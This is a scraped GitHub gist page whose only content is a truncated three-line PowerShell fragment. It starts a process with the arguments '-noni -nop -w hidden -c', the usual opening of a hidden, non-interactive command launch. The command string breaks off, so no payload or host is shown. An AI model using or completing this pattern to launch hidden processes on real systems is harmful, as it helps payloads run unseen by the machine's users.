Skip to content

Instantly share code, notes, and snippets.

@JohnHammond
Created May 3, 2021 23:07
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save JohnHammond/86a1bee9653aae532208a9713031dfe1 to your computer and use it in GitHub Desktop.
Save JohnHammond/86a1bee9653aae532208a9713031dfe1 to your computer and use it in GitHub Desktop.
$s = New-Object System.Diagnostics.ProcessStartInfo;
$s.FileName = $b;
$s.Arguments='-noni -nop -w hidden -c
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment